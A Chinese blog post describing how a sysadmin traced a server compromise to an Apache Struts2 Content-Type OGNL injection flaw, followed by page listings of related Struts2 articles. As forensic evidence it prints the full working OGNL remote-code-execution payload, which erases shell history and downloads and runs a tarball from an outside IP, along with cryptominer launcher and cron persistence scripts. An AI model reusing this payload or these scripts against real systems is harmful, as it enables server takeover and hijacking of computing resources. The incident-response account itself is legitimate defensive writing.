关于apache的Struts2上传机制漏洞

最新推荐文章于 2024-05-31 10:46:10 发布
最新推荐文章于 2024-05-31 10:46:10 发布
阅读量369 收藏
点赞数
文章标签: java 数据库 运维
原文链接:http://blog.51cto.com/wujianwei/2108365
版权

一.环境说明

2018-04-24早上,开发说他们的聊天的项目不能登录,于是立刻查看服务器,结果已经不能远程登录服务器了,但是服务器的外网ip是可以ping通的,无解,只能让机房的同事登录服务器查看。
同事登录服务器,查看原来服务器上的sshd服务被关闭了,导致不能远程连接了
。开启sshd服务,我这边远程登录服务器,查看。服务器上的所有的服务,tomcat
Mysql nginx crond等服务都被关掉了。一开始以为是服务器自身的故障导致服务器重启,线上的服务都没起来,但是查看服务器上服务是否是开机自启动的,结果,服务都是开机自启动。而且top看服务器的运行时间,服务器都是一致都是正常的运行的,也没有重启过。
[root@localhost tmp]# chkconfig --list|grep -E "sshd|mysql|nginx|crond"

crond           0:off   1:off   2:on    3:on    4:on    5:on    6:off
mysqld          0:off   1:off   2:on    3:on    4:on    5:on    6:off
nginx           0:off   1:off   2:off   3:off   4:off   5:off   6:off
sshd            0:off   1:off   2:on    3:on    4:on    5:on    6:off

但是查看系统日志和安全登录日志,以及服务器的历史操作记录,以及我的定时任务的的内容,结果都被清空了,根本无法查找。太诡异了。基于以上的情况出现了两次,
于是对服务器做了安全限制,只能采用秘钥登录,修改服务器的sshd端口,
为了防止服务器上的sshd服务,crond服务,mysql,tomcat被异常关闭,以及定时任务内容被清空,于是写脚本检测服务进程不存在就启动服务,而且特意对crond文件进行了加锁,防止被删掉内容。

好景不长,
2018-04-26,也就是今天下午有出现异常,突然收到7.3服务器负载爆高的报警,
于是又开始排查,原来发现是代码的漏洞导致服务器被植入脚本了,下面是排查过程:
top查看负载,服务器负载飙高
关于apache的Struts2上传机制漏洞

查看cpu高的进程所运行的程序:
关于apache的Struts2上传机制漏洞

[root@localhost .xxz]# cd /var/tmp/
[root@localhost tmp]# ls
1.sh 3.sh sum
发现2个异常脚本和一个可执行程序,于是立刻去掉三个文件的执行权限
chmod 400 1.sh 3.sh sum
关于apache的Struts2上传机制漏洞
发现异常脚本
于是先kill掉sum的这个异常的进程
继续查看进程结果发现md的程序的cpu突然暴增
关于apache的Struts2上传机制漏洞
于是立刻kill掉md程序,服务器的负载迅速下降下来了

查看植入服务器的异常脚本:

root@localhost tmp]# cat 1.sh 
#!/bin/sh
while true; do
    server=`ps aux | grep sum | grep -v grep`
    if [ ! "$server" ]; then
        /var/tmp/sum -a sumo --host pool.sumokoin.hashvault.pro --port 3333 --user Sumoo3cjhZQNWkaxZdKpVeaRMpjDE7PV7VuK3KsGxPRKYvd5oq5VuvE58zCPfoJW8zdoMpW8UmXc4GoA7VgkfocBMgpn52QMG89 --pass xc
        sleep 10
    fi
    sleep 5
done[root@localhost tmp]# cat 3.sh 
#!/bin/sh
while true; do
    server=`ps aux | grep sum | grep -v grep`
    if [ ! "$server" ]; then
        /var/tmp/sum -a sumo --host pool.sumokoin.hashvault.pro --port 3333 --user Sumoo3cjhZQNWkaxZdKpVeaRMpjDE7PV7VuK3KsGxPRKYvd5oq5VuvE58zCPfoJW8zdoMpW8UmXc4GoA7VgkfocBMgpn52QMG89 --pass xc
        sleep 10
    fi
sleep 5

继续排查,查看服务器的系统日志,没发现异常,于是又查看服务器的登录日志,也没发现登录异常的日志文件
tailf /var/log/messages
tailf /var/log/secure

那这些脚本有事如何上传到服务器上的呢? 忽然想到了,服务器上运行的tomcat得服务,而且听开发说是上传文件的java程序, 需要开始一个个日志文件查看,准予让我发现了蛛丝马迹了

[root@localhost logs]# grep export catalina.out 
org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/form-data stream, content type header is %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH ; history -n; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0; cd /tmp; cd /var/tmp; chattr -ais *; wget http://52.175.207.110/.xxlol.tar.gz; curl -O http://52.175.207.110/.xxlol.tar.gz; fetch http://52.175.207.110/.xxlol.tar.gz; lwp-download http://52.175.207.110/.xxlol.tar.gz; tar -xvf .xxlol.tar.gz; rm -rf .xxlol.tar.gz; cd .xxz; chmod 777 *; ./x; ./run; history -c').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

红色的字体,发现下载一个程序到服务器/var/tmp/下面,解压出来是一个隐藏文件

[root@localhost tmp]# pwd
/var/tmp
[root@localhost tmp]# ls -al
total 2644
drwxr-xr-x.  3 root root    4096 Apr 26 15:29 .
drwxr-xr-x. 21 root root    4096 Apr 10  2017 ..
-r--------   1 root root     333 Apr 24 22:44 1.sh
-r--------   1 root root     333 Apr 24 22:06 3.sh
-r--------   1 root root 2684568 Apr 24 22:06 sum
drwx------   2 1002 1002    4096 Apr 26 16:37 .xxz
[root@localhost tmp]# cd .xxz/
[root@localhost .xxz]# ls
a  bash.pid  cron.d  dir.dir  h32  h64  md  run  x
[root@localhost .xxz]#

去掉执行权限:

关于apache的Struts2上传机制漏洞

md h64 h32 run 都是恶意代码的执行程序

[root@localhost .xxz]# cat a 

pwd > dir.dir
dir=$(cat dir.dir)
echo "* * * * * $dir/upd >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep upd
echo "#!/bin/sh
if test -r $dir/bash.pid; then
pid=\$(cat $dir/bash.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd $dir
./run &>/dev/null
chmod u+x upd
./run &>/dev/null

于是百度了一下如下代码:

org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/form-data stream, content type heade

结果查到了struts高危漏洞:
参考地址:
https://paper.seebug.org/241/
于是提交开发让开发修补代码漏洞,解决问题。
此处只是简单的介绍了下遇到黑服务器的几个常见的排查思路

转载于:https://blog.51cto.com/wujianwei/2108365

weixin_34279246
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
struts2上传必备jar包,避免出现struts2的升级漏洞!自己吃亏后分享
10-20
这个bug是由Struts2上传文件后return SUCCESS后报的错误: java.lang.AbstractMethodError: be.telio.mediastore.ui.upload.GarryMultiPartRequest.cleanUp()V at org.apache.struts2.dispatcher.multipart.MultiPartRequestWrapper.cleanUp(MultiPartRequestWrapper.java:271) at org.apache.struts2.dispatcher.Dispatcher.cleanUpRequest(Dispatcher.java:837) at org.apache.struts2.dispatcher.ng.PrepareOperations.cleanupRequest(PrepareOperations.java:103) at org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter.doFilter(StrutsPrepareAndExecuteFilter.java:103) 可以完美解决此类struts2的出错问题!
commons-fileupload-1.3.3.zip
05-14
漏洞为FileUpload 库中的一个高危漏洞,这个库作为Apache Struts 2的一部分,被用作文件上传的默认机制。攻击者可以在未经授权的情况下,执行任意代码并可获取目标系统的所有权限。 CNVD对该漏洞的综合评级为...
struts2漏洞_最新!Apache Struts 又爆安全漏洞(危害程度特别大)
weixin_39952031的博客
11-27 510
Struts 是一个开源的 Java Web MVC 框架,也是 Apache 软件基金会的一个开源项目,包括 Struts 1 和 Struts 2,Struts 1 早已被淘汰,现在市面上说的 Struts 主要是指 Struts 2。很不幸,现在 Struts 2 也是被淘汰的框架了,但也有很多老项目也还是在用 Struts 2 的,所有还在用的小伙伴们需要关注一下。具体就不多说了,具体关注...
Struts2框架下Log4j2漏洞检测方法分析与总结
logic1001的博客
04-10 1044
Log4j2漏洞出现有大半年的时间了,这个核弹级别的漏洞危害很大,但是这个漏洞检测起来却很麻烦,因为黑盒测试无法预判网站哪个应用功能在后台调用了log4j2记录日志功能。目前通用的做法就是使用burpsuite插件进行被动扫描,原理就是把所有与用户交互参数都用各种log4j2检测payload测试一遍,然后观察DNSlog中有没有访问记录。这个漏洞检测方法和SQL注入、XSS漏洞有点像,常规方法很难完全发现漏洞,有时候就连研发人员自己也搞不清楚哪些应用功能点调用了log4j2,
Apache Struts2漏洞复现之s2-005漏洞复现
热爱学习,喜欢折腾!
09-01 439
Apache Struts 2是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java ServletAPI,鼓励开发者采用MVC架构。 缘起于Apache Struts的WebWork框架,旨在提供相对于Struts框架的增强和改进,同时保留与Struts框架类似的结构。2005年12月,WebWork宣布WebWork 2.2以Apache Struts 2的名义合并至Struts。2007年2月第一个全发布(full release)版本释出。
WEB安全性测试-文件上传漏洞
wanglijia26的专栏
04-16 2159
学习章节: 测试入门到精通\软件测试零基础入门资料2015\第二阶段:WEB测试模块\5.web安全性测试\第3章 3.WEB安全性测试--文件上传漏洞 学习内容: 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。 危害: 上传文件是Web脚本语言,服务器的Web容器解释并执行了用户上传的脚本,导致代码...
Struts2漏洞 - Struts2-015 Struts2-016 Struts2-045
HAKUNAMATATATTA的博客
12-21 2238
Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web 应用的开源MVC框架,主要提供两个版本框架产品: Struts 1和Struts2Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。
struts2漏洞
qq_52527336的博客
06-30 9573
记一下笔记一个个写吧
CVE-2023-50164 Apache Struts2漏洞复现
黑剑
12-15 2854
从本质上讲,该漏洞允许攻击者利用 Apache Struts 文件上传系统中的缺陷。它允许他们操纵文件上传参数并执行路径遍历。这种利用可能会导致在服务器上执行任意代码,从而导致各种后果,例如未经授权的数据访问、系统受损,甚至完全控制受影响的系统,包括在系统中放置恶意文件。仔细一看,CVE-2023-50164涉及Apache Struts的文件上传机制中的一个漏洞。对于非技术受众,想象一下这样一个场景:安全检查点(文件上传机制)由于漏洞而被绕过,从而允许未经授权的访问安全区域(服务器)。
java开源包2
06-28
JCaptcha4Struts2 是一个 Struts2的插件,用来增加验证码的支持,使用时只需要用一个 JSP 标签 (<jcaptcha:image label="Type the text "/> ) 即可,直接在 struts.xml 中进行配置,使用强大的 JCaptcha来生成验证码...
Web安全深度剖析(张柄帅)
07-25
8.3.1 Struts2代码执行漏洞 166 8.3.2 ThinkPHP命令执行漏洞 169 8.3 防范命令执行漏洞 169 第9章 文件包含漏洞 171 9.1 包含漏洞原理解析 171 9.1.1 PHP包含 171 9.1.2 JSP包含 180 9.2 安全编写包含 184 9.3 小结 ...
java开源包1
06-28
JCaptcha4Struts2 是一个 Struts2的插件,用来增加验证码的支持,使用时只需要用一个 JSP 标签 (<jcaptcha:image label="Type the text "/> ) 即可,直接在 struts.xml 中进行配置,使用强大的 JCaptcha来生成验证码...
JAVA上百实例源码以及开源项目
01-03
 关于数字签名:产生RSA密钥对(myKeyPair),得到RSA密钥对,产生Signature对象,对用私钥对信息(info)签名,用指定算法产生签名对象,用私钥初始化签名对象,将待签名的数据传送给签名对象(须在初始化之后),用公钥...
Apache Struts 任意命令执行漏洞(高风险)--struts版本的升级
weixin_43922510的博客
08-15 1544
漏洞描述 Struts2 是第二代基于Model-View-Controller (MVC)模型的java企业级web应用框架。它是WebWork和Struts社区合并后的产物。Apache Struts2在实现过程中使用了OGNL表达式,并将用户通过URL提交的内容拼接入OGNL表达式中,当debug模式开启时,攻击者可以通过构造恶意URL来执行任意Java代码,进而可执行任意命令。 漏洞验证 ...
operator <=> (spaceship operator)
janeqi1987的专栏
05-28 997
= 与!= 操作符为了检查是否相等,现在定义== 操作符就够了。当编译器找不到表达式的匹配声明a!=b 时,编译器会重写表达式并查找!(a==b)。若这不起作用,编译器也会尝试改变操作数的顺序,所以也会尝试!(b==a):a!=b,!(b==a)因此,对于TypeA 的a 和TypeB 的b,编译器将能够识别并编译a!= b若需要的话,可以这样做• 一个独立函数operator!• 一个独立函数operator==(TypeA, TypeB)
Java 异常处理中try-catch块、finally子句以及自定义异常的使用
最新发布
Itmastergo的博客
05-31 792
异常是程序运行过程中出现的非正常情况。Java 使用异常类(Exception 类及其子类)来表示这些异常情况。异常处理的核心思想是将正常的程序流程与异常处理流程分离开来,使代码更加清晰和可维护。Throwable 类:所有异常和错误的基类。Error 类:表示系统级的错误,程序通常无法处理,比如内存不足(OutOfMemoryError)。Exception 类:表示程序中可以处理的异常情况。RuntimeException 类。
Java手动启动jar包
liangweihao的博客
05-29 293
【代码】Java手动启动jar包。
java调用cmd执行命令
weixin_45210565的博客
05-28 259
3、exec(String command, String[] envp) ,在调用外部程序之前设置系统环境变量,该变量仅供command入参使用,envp每个元素为一个系统环境变量,并且字符串格式为“环境变量名=环境变量值”。2、exec(String[] cmdArray) ,调用外部程序,入参cmdArray的元素将组合成为一条完整的外部可执行程序的启动路径或命令。1、exec(String command) ,调用外部程序,入参command为外部可执行程序的启动路径或命令。
apache struts2漏洞检测
06-28
### 回答1: Apache Struts2漏洞检测是指通过对Apache Struts2框架进行安全测试,发现并修复其中存在的漏洞,以保障系统的安全性。Apache Struts2是一种流行的Java Web应用程序框架,但由于其复杂性和代码质量问题,可能存在安全漏洞,因此需要进行漏洞检测和修复。常见的Apache Struts2漏洞包括远程代码执行漏洞、命令注入漏洞文件上传漏洞等,需要通过安全测试和修复来保障系统的安全性。 ### 回答2: Apache Struts2 是一个开源的Web应用程序框架。它能够快速、灵活地搭建和部署Web应用程序,因此被广泛使用。但是,2017年3月, Apache Struts2 暴露了一个严重的漏洞 CVE-2017-5638,可被黑客利用进行远程代码执行攻击。 漏洞检测是应对这种情况的重要手段,以下是一些常用的检测方法: 1. 使用漏洞扫描工具:例如 Nmap、OpenVAS 等漏洞扫描工具,可以自动扫描网站中是否存在 CVE-2017-5638 漏洞。 2. 手动检测:手动检测主要包含三个方面:检查 Struts2 版本、检查是否使用与 Struts2 关联的功能组件、检查是否有存在可利用漏洞的Web页面。 3. 可以使用相关的代码检测工具:目前有一些静态代码分析工具可以扫描应用程序源代码中的漏洞,例如:SonarQube、Checkmarx 等。 4. 安装补丁:Apache Struts2 的官方网站通常会发布最新的安全补丁,在检测出漏洞后需要及时更新应用程序。 综上,应当使用多种方法对 Apache Struts2 漏洞进行不间断的检测,以尽早发现潜在的威胁,并采用及时有效的方法进行升级处理。 ### 回答3: Apache Struts是一款基于Java的开源Web应用程序框架。它提供了一些内置组件和标签库,可以简化Web开发过程。但是,近年来,一些严重的漏洞被发现在Struts的核心代码中,因此Struts漏洞测试变得至关重要。本文将介绍Apache Struts2漏洞检测的方法。 1.了解漏洞 在进行漏洞检测之前,首先需要了解存在哪些漏洞Apache Struts2有许多漏洞,例如S2-045,S2-052和S2-057等。您可以检查CVE数据库中的Struts2漏洞列表。每个漏洞都有与之相关的编号和描述。 2.使用漏洞扫描工具 一种简单而快速检测Struts2漏洞的方法是使用漏洞扫描工具。这些工具使用不同的技术和方法来检测漏洞,例如静态代码分析和动态扫描。常见的漏洞扫描工具包括Nessus、Qualys、Acunetix和Burp Suite等。 3.手动检测 手动检测可能需要更多的时间和技能,但它可以发现一些漏洞扫描工具无法检测到的漏洞。下面是一些手动方法: - 查找Struts2页面:访问应用程序并检查URL中是否包含“/struts”的字符串,这是Struts2默认的路径。这可以帮助您确定应用程序是否使用Struts2框架。 - 检查版本号:通过访问“/struts-version”路径或检查响应头中的“X-Struts-Version”来确定Struts2的版本号。这可以帮助您确定是否存在已知的漏洞。 - 测试输入:输入测试数据并尝试使用SQL注入、XSS或命令注入等攻击方法。您可以使用Burp Suite等工具记录和重放请求以便更深入地测试。 总之,Apache Struts2漏洞测试需要综合使用各种技术和方法,包括使用漏洞扫描工具和手动测试。您还应定期更新应用程序并修补漏洞,以保持其安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值